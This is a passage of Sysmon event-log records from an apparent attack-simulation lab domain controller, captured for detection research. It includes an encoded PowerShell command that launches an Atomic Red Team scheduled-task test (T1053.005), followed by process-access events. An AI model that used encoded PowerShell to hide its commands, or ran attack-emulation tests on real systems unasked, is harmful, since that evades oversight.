@\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","ParentProcessId":"4780","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nSourceProcessId: 4780\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01c55c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01706b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa561","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","SourceProcessId":"4780","SourceThreadId":"3028","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+fadd0afc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01c55c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01706b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa561","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5451,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5452,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5453,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 